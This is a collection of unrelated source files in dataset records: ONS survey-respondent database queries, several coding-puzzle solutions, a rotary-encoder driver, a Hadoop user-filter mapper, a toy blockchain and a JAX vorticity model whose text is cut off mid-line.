query_respondent_by_party_uuids(party_uuids, session):\n \"\"\"\n Query to return respondents based on party uuids\n\n :param party_uuids: the party uuids\n :return: respondents or empty list\n \"\"\"\n logger.info(\"Querying respondents by party_uuids\", party_uuids=party_uuids)\n return session.query(Respondent).filter(Respondent.party_uuid.in_(party_uuids))\n\n\ndef query_respondent_by_names_and_emails(first_name, last_name, email, page, limit, session):\n \"\"\"\n returns respondents which match first_name, last_name and email, ignoring case in all cases\n if any parameter is empty then it is ignored\n\n :param first_name: only return respondents whose first name starts with this first_name\n :param last_name: only return respondents whose last name starts with this last_name\n :param email: only return respondents whose email address contains starts with this email\n :param page: return this page of a result set\n :param limit: max number of records per page\n :param session:\n \"\"\"\n\n logger.info(\"Querying respondents by names and/or email\", email=obfuscate_email(email), page=page, limit=limit)\n\n conditions = []\n\n if first_name:\n conditions.append(Respondent.first_name.ilike(f\"{first_name}%\"))\n if last_name:\n conditions.append(Respondent.last_name.ilike(f\"{last_name}%\"))\n if email:\n conditions.append(Respondent.email_address.ilike(f\"%{email}%\"))\n\n offset = (page - 1) * limit\n\n filtered_records = session.query(Respondent).filter(and_(*conditions))\n\n total_count = filtered_records.count()\n\n return filtered_records.order_by(Respondent.last_name.asc()).offset(offset).limit(limit), total_count\n\n\ndef query_respondent_by_party_uuid(party_uuid, session):\n \"\"\"\n Query to return respondent based on party uuid\n\n :param party_uuid: the party uuid\n :return: respondent or none\n \"\"\"\n logger.info(\"Querying respondents by party_uuid\", party_uuid=party_uuid)\n return session.query(Respondent).filter(Respondent.party_uuid == party_uuid).first()\n\n\ndef query_respondent_by_email(email, session):\n \"\"\"\n Query to return respondent based on email\n\n :param email: the party email\n :return: respondent or none\n \"\"\"\n logger.info(\"Querying respondents by email\")\n return session.query(Respondent).filter(func.lower(Respondent.email_address) == email.lower()).first()\n\n\ndef query_single_respondent_by_email(email, session):\n \"\"\"\n Query to return respondent based on email. Must only return 1 result, otherwise it will throw either\n a NoResultFound or MultipleResultsFound exceptions.\n\n :param email: the party email\n :return: single respondent or exception thrown\n \"\"\"\n logger.info(\"Querying respondents by email, expecting exactly one result\")\n return session.query(Respondent).filter(func.lower(Respondent.email_address) == email.lower()).one()\n\n\ndef query_respondent_by_pending_email(email, session):\n \"\"\"\n Query to return respondent based on pending_email_address\n\n :param email: the party uuid\n :return: respondent or none\n \"\"\"\n logger.info(\"Querying respondents by pending email address\")\n return session.query(Respondent).filter(func.lower(Respondent.pending_email_address) == email.lower()).first()\n\n\ndef query_business_respondent_by_respondent_id_and_business_id(business_id, respondent_id, session):\n \"\"\"\n Query to return respondent business associations based on respondent id\n\n :param business_id:\n :param respondent_id:\n :param session:\n :return: business associations for respondent\n \"\"\"\n logger.info(\"Querying business respondent\", respondent_id=respondent_id, business_id=business_id)\n\n response = (\n session.query(BusinessRespondent)\n .filter(and_(BusinessRespondent.business_id == business_id, BusinessRespondent.respondent_id == respondent_id))\n .first()\n )\n return response\n\n\ndef update_respondent_details(respondent_data, respondent_id, session):\n \"\"\"\n Query to return respondent, respondent_data consists of the following parameters: first_name, last_name,\n telephone.\n\n :param respondent_data:\n :param respondent_id: id of the respondent\n :param session:\n :return: True on success, False on failure or if any details are missing\n \"\"\"\n\n logger.info(\"Updating respondent details\", respondent_id=respondent_id)\n respondent_details = query_respondent_by_party_uuid(respondent_id, session)\n\n if (\n respondent_details.first_name != respondent_data[\"firstName\"]\n or respondent_details.last_name != respondent_data[\"lastName\"]\n or respondent_details.telephone != respondent_data[\"telephone\"]\n ):\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {\n Respondent.first_name: respondent_data[\"firstName\"],\n Respondent.last_name: respondent_data[\"lastName\"],\n Respondent.telephone: respondent_data[\"telephone\"],\n }\n )\n\n return True\n return False\n\n\ndef get_respondent_password_verification_token(respondent_id, session):\n \"\"\"\n Query to retrieve the respondent password verification token\n\n :param respondent_id: the id of the respondent\n :param session:\n :returns: verification token\n \"\"\"\n\n logger.info(\"Retrieving respondent verification token\", respondent_id=respondent_id)\n\n response = session.query(Respondent).filter(Respondent.party_uuid == respondent_id).first()\n return response.password_verification_token\n\n\ndef add_respondent_password_verification_token(respondent_id, token, session):\n \"\"\"\n Query to update the respondent password verification tokens\n\n :param respondent_id: id of the respondent\n :param token: the verification token:\n :param session:\n :return: None on success\n \"\"\"\n\n logger.info(\"Adding respondent verification token\", respondent_id=respondent_id)\n\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {Respondent.password_verification_token: token}\n )\n\n\ndef delete_respondent_password_verification_token(respondent_id, session):\n \"\"\"\n Query to update the respondent password verification tokens\n\n :param respondent_id: id of the respondent\n :param session:\n :return: None on success\n \"\"\"\n\n logger.info(\"Removing respondent verification token\", respondent_id=respondent_id)\n\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {Respondent.password_verification_token: None}\n )\n\n\ndef query_password_reset_counter(respondent_id, session):\n \"\"\"\n Query to retrieve the respondent's password reset counter\n\n :param respondent_id: id of the respondent\n :param session:\n :return: current number of password reset attempts\n \"\"\"\n\n logger.info(\"Querying password reset counter\", respondent_id=respondent_id)\n\n response = session.query(Respondent).filter(Respondent.party_uuid == respondent_id).first()\n return response.password_reset_counter\n\n\ndef increase_password_reset_counter(respondent_id, counter, session):\n \"\"\"\n Query to increase the respondent's password reset counter\n\n :param respondent_id: id of the respondent\n :param counter: password reset counter\n :param session:\n :return: None on success\n \"\"\"\n\n logger.info(\"Increasing password reset counter\", respondent_id=respondent_id)\n\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {Respondent.password_reset_counter: counter}\n )\n\n\ndef reset_password_reset_counter(respondent_id, session):\n \"\"\"\n Query to reset the respondent's password reset counter\n\n :param respondent_id: id of the respondent\n :param session:\n :return: None on success\n \"\"\"\n\n logger.info(\"Resetting password reset counter\", respondent_id=respondent_id)\n\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {Respondent.password_reset_counter: 0}\n )\n\n\ndef search_business_with_ru_ref(search_query: str, page: int, limit: int, max_rec: int, session):\n \"\"\"\n This query returns business search on ru reference\n :return: list of businesses\n \"\"\"\n bound_logger = logger.bind(search_query=search_query)\n bound_logger.info(\"Query looks like an ru_ref, searching only on ru_ref\")\n offset = (page - 1) * limit\n if search_query.isdigit():\n if len(search_query) == 11:\n bound_logger.info(\"Searching businesses by full ru_ref with search query\")\n result = (\n session.query(BusinessAttributes.name, BusinessAttributes.trading_as, Business.business_ref)\n .select_from(BusinessAttributes)\n .join(Business)\n .filter(Business.business_ref == search_query)\n .distinct()\n .all()\n )\n return result, len(result)\n\n else:\n bound_logger.info(\"Searching businesses by partial ru_ref with search query\")\n pages = (\n session.query(count(distinct(Business.business_ref)))\n .filter(Business.business_ref.ilike(f\"%{search_query}%\"))\n .distinct()\n )\n result = (\n session.query(BusinessAttributes.name, BusinessAttributes.trading_as, Business.business_ref)\n .select_from(BusinessAttributes)\n .join(Business)\n .filter(Business.business_ref.ilike(f\"%{search_query}%\"))\n .order_by(Business.business_ref.asc())\n .distinct()\n .limit(limit)\n .offset(offset)\n )\n estimated_total_records = pages.scalar()\n # we don't want to overload database with the search which retrieves more than 10000 records\n # as it's irrelevant to show so many records as a paginated search on frontend\n # hence this 'if' logic will avoid such searches and frontend will ask the user to refine their search\n if pages.scalar() > max_rec:\n return [], estimated_total_records\n return result, estimated_total_records\n\n\ndef search_businesses(search_query: str, page: int, limit: int, max_rec: int, session):\n \"\"\"\n Query to return list of businesses based on key word search/ business names\n :return: list of businesses\n \"\"\"\n bound_logger = logger.bind(search_query=search_query)\n bound_logger.info(\"Searching businesses by name with search query\")\n offset = (page - 1) * limit\n # Direct search else normal like search\n regex = re.compile(\"[@_!#$%^&*()<>?/|}{~:]\")\n if len(search_query.split()) == 1 and regex.search(search_query) is None:\n direct_pages = (\n session.query(count(distinct(BusinessAttributes.name)))\n .filter(\n and_(\n or_(\n BusinessAttributes.name.ilike(f\"{search_query}\"),\n BusinessAttributes.trading_as.ilike(f\"{search_query}\"),\n ),\n BusinessAttributes.collection_exercise.isnot(None),\n )\n )\n .distinct()\n )\n direct_result = (\n session.query(BusinessAttributes.name, BusinessAttributes.trading_as, Business.business_ref)\n .select_from(BusinessAttributes)\n .join(Business)\n .filter(\n and_(\n or_(\n BusinessAttributes.name.ilike(f\"{search_query}\"),\n BusinessAttributes.trading_as.ilike(f\"{search_query}\"),\n ),\n BusinessAttributes.collection_exercise.isnot(None),\n )\n )\n .order_by(BusinessAttributes.name.asc())\n .distinct()\n .limit(limit)\n .offset(offset)\n )\n\n estimated_direct_total = direct_pages.scalar()\n # we don't want to overload database with the search which retrieves more than 10000 records\n # as its irrelevant to show so many records as a paginated search on frontend\n # hence this 'if' logic will avoids such searches and frontend will ask the user to refine their search\n if estimated_direct_total > max_rec:\n return [], estimated_direct_total\n if estimated_direct_total != 0:\n return direct_result, estimated_direct_total\n\n pages = (\n session.query(count(distinct(BusinessAttributes.name)))\n .filter(\n and_(\n or_(\n BusinessAttributes.name.ilike(f\"%{search_query}%\"),\n BusinessAttributes.trading_as.ilike(f\"%{search_query}%\"),\n ),\n BusinessAttributes.collection_exercise.isnot(None),\n )\n )\n .distinct()\n )\n result = (\n session.query(BusinessAttributes.name, BusinessAttributes.trading_as, Business.business_ref)\n .select_from(BusinessAttributes)\n .join(Business)\n .filter(\n and_(\n or_(\n BusinessAttributes.name.ilike(f\"%{search_query}%\"),\n BusinessAttributes.trading_as.ilike(f\"%{search_query}%\"),\n ),\n BusinessAttributes.collection_exercise.isnot(None),\n )\n )\n .order_by(BusinessAttributes.name.asc())\n .distinct()\n .limit(limit)\n .offset(offset)\n )\n estimated_total_records = pages.scalar()\n # we don't want to overload database with the search which retrieves more than 10000 records\n # as its irrelevant to show so many records as a paginated search on frontend\n # hence this 'if' logic will avoids such searches and frontend will ask the user to refine their search\n if estimated_total_records > max_rec:\n return [], estimated_total_records\n return result, estimated_total_records\n\n\ndef query_pending_survey_by_batch_no(batch_no, session):\n \"\"\"\n Query to return pending survey by batch no.\n :param batch_no: UUID\n :return: share surveys\n \"\"\"\n logger.info(\"Querying share_surveys\", batch_no=batch_no)\n response = session.query(PendingSurveys).filter(PendingSurveys.batch_no == batch_no).all()\n return response\n\n\ndef query_pending_survey_by_shared_by(shared_by, session):\n \"\"\"\n Query to return pending survey by shared by party id.\n :param shared_by: UUID\n :return: share surveys\n \"\"\"\n logger.info(\"Querying share_surveys\", shared_by=str(shared_by))\n response = session.query(PendingSurveys).filter(PendingSurveys.shared_by == shared_by).all()\n return response\n\n\ndef delete_pending_survey_by_batch_no(batch_no, session):\n \"\"\"\n Query to delete existing pending survey by batch no.\n :param batch_no: UUID\n :return: pending surveys\n \"\"\"\n logger.info(\"Querying share_surveys\", batch_no=batch_no)\n response = session.query(PendingSurveys).filter(PendingSurveys.batch_no == batch_no).delete()\n return response\n\n\ndef query_enrolment_by_survey_business_respondent(respondent_id, business_id, survey_id, session):\n \"\"\"\n Query to return enrolment based on respondent id, business id and survey\n\n :param respondent_id:\n :param business_id:\n :param survey_id:\n :return: enrolment for survey and business for respondent\n \"\"\"\n\n logger.info(\"Querying enrolment\", respondent_id=respondent_id, business_id=business_id, survey_id=survey_id)\n\n response = (\n session.query(Enrolment)\n .filter(\n and_(\n Enrolment.respondent_id == respondent_id,\n Enrolment.business_id == business_id,\n Enrolment.survey_id == survey_id,\n )\n )\n .first()\n )\n return response\n\n\ndef query_all_non_disabled_enrolments_respondent(respondent_id, session):\n \"\"\"\n Query to return all non disabled enrolments based on respondent id\n\n :param respondent_id: the id column from the respondent (integer not uuid)\n :return: enrolments for the respondent\n \"\"\"\n\n logger.info(\"Querying all enrolments for respondent\", respondent_id=respondent_id)\n\n response = (\n session.query(Enrolment)\n .filter(and_(Enrolment.respondent_id == respondent_id, Enrolment.status != \"DISABLED\"))\n .all()\n )\n return response\n\n\ndef count_enrolment_by_survey_business(business_id, survey_id, session):\n \"\"\"\n Query to return count of enrolments for given business id and survey\n\n :param business_id:\n :param survey_id:\n :return: Integer count of number of enrolments\n \"\"\"\n logger.info(\"Querying enrolment\", business_id=business_id, survey_id=survey_id)\n response = (\n session.query(Enrolment)\n .filter(\n and_(\n Enrolment.business_id == business_id,\n Enrolment.survey_id == survey_id,\n Enrolment.status == EnrolmentStatus.ENABLED,\n )\n )\n .count()\n )\n return response\n","repo_name":"ONSdigital/ras-party","sub_path":"ras_party/controllers/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":22306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"43533677815","text":"class Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n rows = [set() for _ in range(9)]\n cols = [set() for _ in range(9)]\n blocks = [set() for _ in range(9)]\n\n for row in range(9):\n for col in range(9):\n num = board[row][col]\n if num == '.':\n continue\n\n curr_block = (row//3) * 3 + (col//3)\n # check for repitition\n if num in rows[row]:\n return False\n\n if num in cols[col]:\n return False\n\n if num in blocks[curr_block]:\n return False\n\n # add the current element\n rows[row].add(num)\n cols[col].add(num) \n blocks[curr_block].add(num)\n\n return True\n\n\n\n","repo_name":"yonass08/A2SV-Group-41","sub_path":"valid-sudoku.py","file_name":"valid-sudoku.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73049725891","text":"#\n\n\"\"\"\n\"\"\"\n\nclass Revision:\n\t\"\"\"\n\t\"\"\"\n\n\t_ATTRS = ('a', 'b')\n\n\tdef __init__(self, api=None, **kwargs):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tfor k, v in kwargs.items():\n\t\t\tif k not in self._ATTRS:\n\t\t\t\tmsg = 'Unknown attribute given for Revision: {} (value: {})'.format(k, v)\n\t\t\t\traise AttributeError(msg)\n\n\t\t\tsetattr(self, k, v)\n","repo_name":"weirdgloop/cresbot","sub_path":"lib/mediawiki/revision.py","file_name":"revision.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10542178278","text":"import collections\nclass Solution:\n def slidingPuzzle(self, board):\n # https://leetcode-cn.com/problems/sliding-puzzle/solution/hua-dong-mi-ti-by-leetcode/\n '''\n BFS 模版\n queue = collections.deque([(start, 0)])\n seen = {start}\n while queue:\n node, depth = queue.popleft()\n if node == target: return depth\n for nei in neighbors(node):\n if nei not in seen:\n seen.add(nei)\n queue.append((nei, depth+1))\n '''\n # BFS 模板套路 参考非递归便利二叉树 一样一样的\n m, n = len(board), len(board[0])\n board = tuple([x for i in range(m) for x in board[i]])\n queue = collections.deque([(board, board.index(0), 0)])\n target = tuple(list(range(1, m * n)) + [0])\n seen = {board}\n while queue:\n cur, idx, step = queue.popleft()\n if cur == target:\n return step\n for d in [-1, 1, n, -n]:\n new_idx = idx + d\n if abs(new_idx // n - idx // n) + abs(new_idx % n - idx % n) != 1: continue # 比如 2+1=3,这种变换就不行\n if new_idx < 0 or new_idx >= m * n: continue\n new_board = list(cur)\n new_board[idx], new_board[new_idx] = new_board[new_idx], new_board[idx]\n new_board = tuple(new_board)\n if new_board not in seen:\n seen.add(new_board)\n queue.append((new_board, new_idx, step + 1))\n return -1\n","repo_name":"BUAAChuanWang/Coding","sub_path":"03_BFS/773. 滑动谜题.py","file_name":"773. 滑动谜题.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"69914381571","text":"import math\r\n\r\nvezes = int(input(\"\"))\r\nif vezes > 500 or vezes < 1:\r\n exit(1)\r\nfor i in range(vezes):\r\n l, r = map(int, input(\"\").split())\r\n achou=-1\r\n for i in range(1,r):\r\n for j in range(1,r):\r\n if i+j>l and i+j 100 and dtime < 1000):\n if self.increment == 1:\n self.increment = 10\n elif self.increment == 10:\n self.increment = 100\n elif self.increment == 100:\n self.increment = 1\n self.buttontime = 0\n self.arg[2] = self.increment\n elif self.sw_pin.value() and dtime > 1000:\n self.buttontime = 0\n self.arg[0] = 0\n self.arg[1] = 0\n micropython.schedule(self.call_handlers, [self.arg])\n \n def add_handler(self, handler):\n self.handlers.append(handler)\n \n def call_handlers(self, value):\n for handler in self.handlers:\n handler(value)","repo_name":"heli2src/GRBL_MPG_DRO_with_Teensy_and_mpgWheels","sub_path":"src/mpg_wheel/RP2040/rotary.py","file_name":"rotary.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"23482778361","text":"#fh=open(\"/etc/passwd\",\"r\")\nimport sys\nfh = sys.stdin\nfor line in fh:\n line=line.strip()\n userdb=line.split(\":\")\n uid=userdb[2]\n shell=userdb[6]\n if int(uid) <= 1000 and shell == \"/bin/bash\":\n print(line)\nfh.close()\n","repo_name":"shubhambhardwaj007/Hadoop-Mapreduce-Program","sub_path":"user_login/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4672980169","text":"import hashlib as hasher\r\nimport datetime as date\r\nimport pprint\r\n\r\n\r\nclass Block:\r\n def __init__( self, index, data, previous_hash ):\r\n self.index = index\r\n self.timestamp = date.datetime.now()\r\n self.data = data\r\n self.previous_hash = previous_hash\r\n self.nonce, self.hash = self.compute_hash_with_proof_of_work()\r\n\r\n def compute_hash_with_proof_of_work( self, difficulty=\"00\" ):\r\n nonce = 0\r\n while True: \r\n hash = self.calc_hash_with_nonce( nonce )\r\n if hash.startswith( difficulty ):\r\n return [nonce,hash] \r\n else:\r\n nonce += 1 \r\n\r\n def calc_hash_with_nonce( self, nonce=0 ):\r\n sha = hasher.sha256()\r\n sha.update(str(nonce).encode(\"utf-8\") +\r\n str(self.index).encode(\"utf-8\") +\r\n str(self.timestamp).encode(\"utf-8\") +\r\n str(self.data).encode(\"utf-8\") +\r\n str(self.previous_hash).encode(\"utf-8\"))\r\n return sha.hexdigest()\r\n\r\n\r\n def __repr__( self ):\r\n return \"Block<\\n index: {},\\n timestamp: {},\\n data: {},\\n previous_hash: {},\\n nonce: {},\\n hash: {}>\".format(\r\n self.index, self.timestamp, self.data, self.previous_hash, self.nonce, self.hash)\r\n\r\n\r\n @staticmethod\r\n def first( data=\"Genesis\" ):\r\n return Block( 0, data, \"0\" )\r\n\r\n @staticmethod\r\n def next( previous, data=\"Transaction Data...\" ):\r\n return Block( previous.index+1, data, previous.hash )\r\n\r\n\r\n\r\n\r\n\r\nb0 = Block.first( \"Genesis\" )\r\nb1 = Block.next( b0, \"Transaction Data...\" )\r\nb2 = Block.next( b1, \"Transaction Data......\" )\r\nb3 = Block.next( b2, \"More Transaction Data...\" )\r\n\r\n\r\nblockchain = [b0, b1, b2, b3]\r\n\r\npprint.pprint( blockchain )\r\n","repo_name":"GustavoDuregger/blockchain","sub_path":"blockchain.py/proof_of_work.py","file_name":"proof_of_work.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"44091505891","text":"# https://www.hackerrank.com/challenges/gem-stones/problem\n\nn = int(input())\narr = [set(input()) for _ in range(n)]\nsub = arr[0]\n\nfor a in arr:\n sub.intersection_update(a)\n\nprint(len(sub))\n","repo_name":"JaredLGillespie/HackerRank","sub_path":"Python/gem-stones.py","file_name":"gem-stones.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"43"} +{"seq_id":"3930830815","text":"# This script is an older standalone verion of BVEX. It is included here for \n# demonstrating the chaos in this system. If you compare results from this\n# code and the current code, you will find that at t=30 notable differences\n# appear, and by t=50 they look significantly different. \n# This code carries wave coefficient as model state while the lastest \n# version carries vorcticity in physical space.\n\n\nimport jax\nimport jax.numpy as jnp\nfrom jax.numpy.fft import fft2, ifft2\nimport numpy.fft as nfft\nimport netCDF4 as nc4\nfrom namelist import *\n\nimport time\n\n\n# timers for performance evaluation\ntimerSetup = 0.0\ntimerRelay1 = 0.0 # first relay\ntimerRelayO = 0.0 # other relays\ntimerWrite = 0.0\nwalltime = time.time()\n\n\ndef setup_ic_grid(shear_frac, rand_seed):\n \"\"\" Setup initial conditions \"\"\"\n\n x1d = np.linspace(2.0 * np.pi / nx / 2, 2.0 * np.pi - 2.0 * np.pi / nx / 2, nx)\n y1d = np.linspace(2.0 * np.pi / ny / 2, 2.0 * np.pi - 2.0 * np.pi / ny / 2, ny)\n x2d, y2d = np.meshgrid(x1d, y1d, indexing=\"ij\")\n\n tmp1 = np.linspace(0, nx / 2 - 1, int(np.around(nx / 2))) * 2 * np.pi / lx\n tmp2 = np.linspace(-nx / 2, -1, int(np.around(nx / 2))) * 2 * np.pi / lx\n kx1d = np.concatenate((tmp1, tmp2))\n tmp1 = np.linspace(0, ny / 2 - 1, int(np.around(ny / 2))) * 2 * np.pi / ly\n tmp2 = np.linspace(-ny / 2, -1, int(np.around(ny / 2))) * 2 * np.pi / ly\n ky1d = np.concatenate((tmp1, tmp2))\n kx2d, ky2d = np.meshgrid(kx1d, ky1d, indexing=\"ij\")\n k2 = kx2d * kx2d + ky2d * ky2d\n del2 = -k2\n del2[0, 0] = 1\n\n # #---------------------------\n # # Purely random noise; for Komogorov flow or others \n # q_0 = np.zeros((nx, ny)) \n # q0_h = fft2(q_0) \n # p0_h = q0_h / del2 \n # p_0 = np.real(ifft2(p0_h)) \n # np.random.seed(rand_seed) \n # q_0 = q_0 + (np.random.uniform(0.0, 1.0, (nx, ny)) - 0.5) / 10.0 \n # #---------------------------\n\n #---------------------------\n # Shear zone setup for simpler Kelvin-Helmholtz instability\n q_0 = -(shear_frac / (2 * shear_frac - 1)) * np.sin(\n np.pi - (2 * shear_frac / (2 * shear_frac - 1) * y2d)\n )\n q_0[\n (y2d >= (2 * shear_frac - 1) / (2 * shear_frac) * np.pi)\n & (y2d <= (2 * shear_frac + 1) / (2 * shear_frac) * np.pi)\n ] = (2 * shear_frac / np.pi)\n q_0[y2d > (2 * shear_frac + 1) * np.pi / (2 * shear_frac)] = -(\n shear_frac / (2 * shear_frac - 1)\n ) * np.sin(\n (2 * shear_frac)\n / (2 * shear_frac - 1)\n * y2d[y2d > (2 * shear_frac + 1) * np.pi / (2 * shear_frac)]\n - (2 * shear_frac + 1) / (2 * shear_frac - 1) * np.pi\n )\n q0_h = fft2(q_0)\n p0_h = q0_h / del2\n p_0 = np.real(ifft2(p0_h))\n np.random.seed(rand_seed)\n q_0 = q_0 + (np.random.uniform(0.0, 1.0, (nx, ny)) - 0.5) / 10.0 * np.max(\n np.abs(q_0)\n )\n #---------------------------\n\n return q_0, p_0, kx2d, ky2d, del2, x2d, y2d, x1d, y1d\n\n\ndef rhs_tendency(q_hat, t_now, del2, kx2d, ky2d, p0, y2d):\n \"\"\" Compute the RHS tendency due to advection and forcing \"\"\"\n p_hat = q_hat / del2\n q = jnp.real(ifft2(q_hat))\n dpdx = jnp.real(ifft2(1j * kx2d * p_hat))\n dpdy = jnp.real(ifft2(1j * ky2d * p_hat))\n dqdx = jnp.real(ifft2(1j * kx2d * q_hat))\n dqdy = jnp.real(ifft2(1j * ky2d * q_hat))\n\n adv = dpdx * dqdy - dpdy * dqdx\n adv_hat = fft2(adv)\n \n # #---------------------------\n # # Komogorov forcing\n # u_forcing = np.sin(4.0*y2d) \n # forcing_hat = -1j * ky2d * nfft.fft2(u_forcing)\n # #---------------------------\n\n #---------------------------\n # Simple shear zone forcing\n p_now = jnp.real(ifft2(p_hat))\n forcing = (\n -alpha\n * (p_now - p0)\n * ((1.0 - jnp.cos(t_now / 5.0 * jnp.pi)) / 2.0) ** 4.0\n * (((1.0 - jnp.cos(y2d)) / 2.0) ** 4 + 1.0 / 24.0)\n * (24.0 / 25.0)\n )\n forcing_hat = del2 * fft2(forcing)\n #---------------------------\n\n rhs = -adv_hat + forcing_hat\n\n return rhs\n\n\n@jax.jit\ndef edtrk4(q_hat, t_now):\n \"\"\" Integrate the model for one step with the EDTRK4 scheme \"\"\"\n # https://github.com/navidcy/barotropic_QG\n\n # Define model parameters as numpy arrays so that they become static later\n # obtain p0 and wavenumber info from setupICs\n _, p0, kx2d, ky2d, del2, x2d, y2d, _, _ = setup_ic_grid(shearFrac, randSeed)\n\n k2 = kx2d * kx2d + ky2d * ky2d\n\n s = 4\n k = np.sqrt(k2)\n k_max = ny / 2\n k_max_s = k_max * (lx / nx)\n k_cut = 2 / 3 * k_max\n k_cut_s = k_cut * (ly / ny)\n a = -np.log(1e-15) / ((k_max_s - k_cut_s) ** s) * ((ly / ny) ** s)\n mask = np.ones((nx, ny)) * np.abs(k <= ny / 3) + np.exp(\n -a * (k - k_cut) ** s\n ) * np.abs(k > ny / 3)\n # Calculate coefficients for the EDTRK4 algorithm \"\"\"\n lin = -mu - nu * k2 ** 2\n e_lin = np.exp(lin * dt)\n e_lin2 = np.exp(lin * dt / 2)\n m_pts = 64\n r = np.exp(2j * np.pi / m_pts * np.linspace(1, m_pts, m_pts))\n fu = np.zeros((nx, ny))\n fab = fu\n fc = fu\n h_2 = fu # in the limit lin->0, this coefficient becomes dt/2\n for m in range(0, m_pts):\n z = r[m] + lin * dt\n h_2 = h_2 + dt * (np.exp(z / 2) - 1) / z\n fu = fu + dt * (-4 - z + np.exp(z) * (4 - 3 * z + z ** 2)) / z ** 3\n fab = fab + dt * (+2 + z + np.exp(z) * (-2 + z)) / z ** 3\n fc = fc + dt * (-4 - 3 * z - z ** 2 + np.exp(z) * (4 - z)) / z ** 3\n fu = fu / m_pts\n fab = fab / m_pts\n fc = fc / m_pts\n h_2 = h_2 / m_pts\n\n # integration for one step\n nlin0_z = rhs_tendency(q_hat, t_now, del2, kx2d, ky2d, p0, y2d)\n k1z = e_lin2 * q_hat + h_2 * nlin0_z\n nlin1_z = rhs_tendency(k1z, t_now, del2, kx2d, ky2d, p0, y2d)\n k2z = e_lin2 * q_hat + h_2 * nlin1_z\n nlin2_z = rhs_tendency(k2z, t_now, del2, kx2d, ky2d, p0, y2d)\n k3z = e_lin2 * k1z + h_2 * (2 * nlin2_z - nlin0_z)\n nlin3_z = rhs_tendency(k3z, t_now, del2, kx2d, ky2d, p0, y2d)\n\n q_h_new = (\n e_lin * q_hat + fu * nlin0_z + 2 * fab * (nlin1_z + nlin2_z) + fc * nlin3_z\n )\n\n q_h_new = q_h_new * mask\n\n t_new = jnp.around(t_now + dt, 6)\n return q_h_new, t_new\n\n\n@jax.jit\ndef sprint(physics_state, _):\n \"\"\" Integrate the model for nSteps steps \"\"\"\n\n q_hat, t_now = jnp.split(physics_state, 2, axis=0)\n t_set = jnp.real(t_now[0, 0, 0]) + np.arange(nSteps) * dt\n\n q_hat_new, t_set_new = jax.lax.scan(edtrk4, jnp.squeeze(q_hat), t_set)\n\n t_new = jnp.around(jnp.full((nx, ny), t_set_new[-1]), 6)\n physics_state_new = jnp.stack((q_hat_new, t_new), axis=0)\n # both outputs have q_hat_new, but only the second will be stacked if this\n # function is scanned by another function\n return physics_state_new, q_hat_new\n\n\n@jax.jit\ndef relay(_, physics_state):\n \"\"\" Run a number of sprints to obtain n_sprints output slices \n\n physics_state is the I.C. for a given time. The function integrates for \n nSprints*nSteps*dt time and saves nSprints output slices.\n\n ``carry`` (_) is a dummy argument for now. \n \n In standalone integration, physics_state_end can be used for the next loop\n (using while or for).\n \"\"\"\n\n # Integrate the model for nSprints\n physics_state_end, q_hat_set = jax.lax.scan(\n sprint, physics_state, None, length=nSprints\n )\n return physics_state_end, q_hat_set\n\n\n@jax.jit\ndef race(physics_state_batch):\n \"\"\" Apply ``relay`` to a batch of physics states\n\n Output q_hat_batch[batch, time_slices, x, y]\n \"\"\"\n\n # Integrate the batch for nSprints each\n carry = physics_state_batch[0]\n _, q_hat_batch = jax.lax.scan(relay, carry, physics_state_batch)\n\n return q_hat_batch\n\n\ndef write2ncfile(time_rec, zeta_rec, psi_rec, ix, iy):\n \"\"\" Write data to a NetCDF file \"\"\"\n start_time = time_rec[0]\n end_time = time_rec[-1]\n filename = fileNameFormat % (start_time, end_time)\n ncfile = nc4.Dataset(filename, mode=\"w\", format=\"NETCDF4\")\n ncfile.createDimension(\"y\", ny)\n ncfile.createDimension(\"x\", nx)\n ncfile.createDimension(\"time\", None)\n\n y_nc = ncfile.createVariable(\"y\", np.float32, (\"y\",))\n y_nc.long_name = \"y\"\n x_nc = ncfile.createVariable(\"x\", np.float32, (\"x\",))\n x_nc.long_name = \"x\"\n itime = ncfile.createVariable(\"time\", np.float32, (\"time\",))\n itime.long_name = \"time\"\n\n zeta = ncfile.createVariable(\n \"zeta\", np.float32, (\"time\", \"y\", \"x\"), fill_value=1.0e36\n )\n zeta.long_name = \"vorticity\"\n\n psi = ncfile.createVariable(\n \"psi\", np.float32, (\"time\", \"y\", \"x\"), fill_value=1.0e36\n )\n psi.standard_name = \"streamfunction\"\n\n x_nc[:] = ix\n y_nc[:] = iy\n zeta[:, :, :] = zeta_rec[:, :, :]\n psi[:, :, :] = psi_rec[:, :, :]\n itime[:] = time_rec[:]\n\n ncfile.close()\n return filename\n\n\n#=====================================================\n# Main body\n\n# Create array to save data (for ML training these need to be stacked/concatenated jnp arrays)\nnumRec = np.min([1000, nSprints]).astype(int)\nzetaRec = np.empty((numRec, ny, nx), dtype=np.float32)\npsiRec = np.empty((numRec, ny, nx), dtype=np.float32)\ntimeRec = np.empty((numRec,), dtype=np.float32)\n\ntimerSetup = time.time() - walltime + timerSetup\nwalltime 